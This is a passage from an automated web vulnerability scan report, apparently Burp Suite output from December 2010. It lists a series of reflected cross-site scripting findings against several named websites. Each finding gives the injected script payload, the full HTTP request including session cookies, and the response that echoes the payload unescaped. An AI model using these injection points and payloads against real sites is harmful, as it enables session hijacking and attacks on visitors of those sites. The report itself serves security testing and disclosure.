The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a99a9<script>alert(1)</script>386ffe1788 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commona99a9<script>alert(1)</script>386ffe1788/ad_count.php HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:00 GMT
Content-Length: 762
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/commona99a9<script>alert(1)</script>386ffe1788/ad_count.php"</strong>
...[SNIP]...

2.589. http://www.themtn.tv/common/ad_count.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/ad_count.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffea4<script>alert(1)</script>f5f93be3da4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/ad_count.phpffea4<script>alert(1)</script>f5f93be3da4 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:00 GMT
Content-Length: 763
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/ad_count.phpffea4<script>alert(1)</script>f5f93be3da4"</strong>
...[SNIP]...

2.590. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/dynrss/dynrss_3174_landing_.rss

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1f64f<script>alert(1)</script>6b730c5afbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common1f64f<script>alert(1)</script>6b730c5afbf/dynrss/dynrss_3174_landing_.rss HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:09 GMT
Content-Length: 782
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common1f64f<script>alert(1)</script>6b730c5afbf/dynrss/dynrss_3174_landing_.rss"</strong>
...[SNIP]...

2.591. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/dynrss/dynrss_3174_landing_.rss

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 95064<script>alert(1)</script>aa7d62804c2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss95064<script>alert(1)</script>aa7d62804c2/dynrss_3174_landing_.rss HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:11 GMT
Content-Length: 782
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss95064<script>alert(1)</script>aa7d62804c2/dynrss_3174_landing_.rss"</strong>
...[SNIP]...

2.592. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/dynrss/dynrss_3174_landing_.rss

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5041<script>alert(1)</script>7a7940557b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/dynrss/dynrss_3174_landing_.rssf5041<script>alert(1)</script>7a7940557b HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:11 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/dynrss/dynrss_3174_landing_.rssf5041<script>alert(1)</script>7a7940557b"</strong>
...[SNIP]...

2.593. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6e83<script>alert(1)</script>4b77393189d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /commonf6e83<script>alert(1)</script>4b77393189d/global_flash/player/player.php HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:03 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/commonf6e83<script>alert(1)</script>4b77393189d/global_flash/player/player.php"</strong>
...[SNIP]...

2.594. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f3700<script>alert(1)</script>b37fd5a9aa9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashf3700<script>alert(1)</script>b37fd5a9aa9/player/player.php HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:03 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashf3700<script>alert(1)</script>b37fd5a9aa9/player/player.php"</strong>
...[SNIP]...

2.595. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8fd2b<script>alert(1)</script>dffce2489ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player8fd2b<script>alert(1)</script>dffce2489ad/player.php HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:04 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player8fd2b<script>alert(1)</script>dffce2489ad/player.php"</strong>
...[SNIP]...

2.596. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d09a<script>alert(1)</script>118ab34c06d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php8d09a<script>alert(1)</script>118ab34c06d HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:06 GMT
Content-Length: 781
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php8d09a<script>alert(1)</script>118ab34c06d"</strong>
...[SNIP]...

2.597. http://www.themtn.tv/common/js/aggregate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c78eb<script>alert(1)</script>9adee482cf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/c78eb<script>alert(1)</script>9adee482cf8 HTTP/1.1
Host: www.themtn.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:45:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:45:02 GMT
Content-Length: 754
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/c78eb<script>alert(1)</script>9adee482cf8"</strong>
...[SNIP]...

2.598. http://www.themtn.tv/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a55f9<script>alert(1)</script>fbf79e45481 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a55f9<script>alert(1)</script>fbf79e45481 HTTP/1.1
Host: www.themtn.tv
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:35:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:35:22 GMT
Connection: close
Content-Length: 744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/a55f9<script>alert(1)</script>fbf79e45481"</strong>
...[SNIP]...

2.599. http://www.themtn.tv/pages/main [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78f17<script>alert(1)</script>5aa428b6bfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages78f17<script>alert(1)</script>5aa428b6bfa/main HTTP/1.1
Host: www.themtn.tv
Proxy-Connection: keep-alive
Referer: http://www.themtn.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:33:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:59 GMT
Connection: close
Content-Length: 754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pages78f17<script>alert(1)</script>5aa428b6bfa/main"</strong>
...[SNIP]...

2.600. http://www.themtn.tv/pages/main [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b76d<script>alert(1)</script>c2b6428ae8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/main7b76d<script>alert(1)</script>c2b6428ae8d HTTP/1.1
Host: www.themtn.tv
Proxy-Connection: keep-alive
Referer: http://www.themtn.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:34:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:34:00 GMT
Connection: close
Content-Length: 773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/main7b76d<script>alert(1)</script>c2b6428ae8d"</strong>
...[SNIP]...

2.601. http://www.themtn.tv/pages/main [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.themtn.tv
Path:   /pages/main

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85403"><script>alert(1)</script>493fd61f5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pages/main?85403"><script>alert(1)</script>493fd61f5e9=1 HTTP/1.1
Host: www.themtn.tv
Proxy-Connection: keep-alive
Referer: http://www.themtn.tv/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Set-Cookie: PHPSESSID=71b7409ad8c2f41dbdfc21c59df89a9b; path=/
Vary: Accept-Encoding
Expires: Sun, 19 Dec 2010 18:33:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:33:59 GMT
Connection: close
Content-Length: 30405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<!--
web1.platformic.com
-->
<meta http-equiv="Content-Type" content="t
...[SNIP]...
<input type=hidden name="85403"><script>alert(1)</script>493fd61f5e9" id = "85403">
...[SNIP]...

2.602. http://www.tumri.net/ads/mts/6274 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mts/6274

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9881'-alert(1)-'7a4c43502de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mts/6274?f9881'-alert(1)-'7a4c43502de=1 HTTP/1.1
Host: www.tumri.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=020B0167569A6522B9BD387DAD716B0F; C=-18871661|2094410516; t_opt=OPT-OUT;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Sun Dec 19 18:45:08 UTC 2010
Set-Cookie: JSESSIONID=3F97375BEDAA695CA501CE068F690C20; Path=/ads
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 1871
Date: Sun, 19 Dec 2010 18:45:07 GMT
Connection: close


var NS_1292784308107 = {

flashVersion: 0,
getFlashVersion: function(){
// ie
try {
try {
var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlas
...[SNIP]...
frameborder="0" width="728" height="90" style="margin:0px;" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://www.tumri.net/ads/mti/6274?sc=y&f9881'-alert(1)-'7a4c43502de=1&nf=' + NS_1292784308107.flashVersion + '">
...[SNIP]...

2.603. http://www.tvoneonline.com/gettvone.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvoneonline.com
Path:   /gettvone.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a60ad"><script>alert(1)</script>76335cbc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gettvone.asp?a60ad"><script>alert(1)</script>76335cbc09=1 HTTP/1.1
Host: www.tvoneonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.121.222.18-2331042192.30121898:lv=1292776094923:ss=1292776094923; aaa2w=1; ASPSESSIONIDCSADTBAR=DGKGNDKCOJJOPCMDFHDMEPCH;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7247
Content-Type: text/html
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>TV One Online | Get TV One</title>
<link href="/scrip
...[SNIP]...
<iframe align="top" frameborder="0" height="950" width="580" scrolling="yes" src="http://tvone.viewerlink.tv/?a60ad"><script>alert(1)</script>76335cbc09=1">
...[SNIP]...

2.604. http://www.tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvoneonline.com
Path:   /video/b_player.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413df"><script>alert(1)</script>0091d75c0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/b_player.php?413df"><script>alert(1)</script>0091d75c0a=1 HTTP/1.1
Host: www.tvoneonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WT_FPC=id=174.121.222.18-2331042192.30121898:lv=1292776094923:ss=1292776094923; aaa2w=1; ASPSESSIONIDCSADTBAR=DGKGNDKCOJJOPCMDFHDMEPCH;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:45:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Content-type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<title>A Different World, Lincoln Heights, Love That Girl, Way Bl
...[SNIP]...
<form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?413df"><script>alert(1)</script>0091d75c0a=1#comments_anchor" onsubmit="rememberfields()" style="display:none;">
...[SNIP]...

2.605. http://www.tweetology.com/images/button-login.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tweetology.com
Path:   /images/button-login.png

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 49d2a--><a>25b0fc71d41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images49d2a--><a>25b0fc71d41/button-login.png HTTP/1.1
Host: www.tweetology.com
Proxy-Connection: keep-alive
Referer: http://www.csnchicago.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Sun, 19 Dec 2010 18:37:35 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Set-Cookie: PHPSESSID=r6u9ro3t6dmkmeoajqbv1945e7; path=/
X-Powered-By: PHP/5.2.11
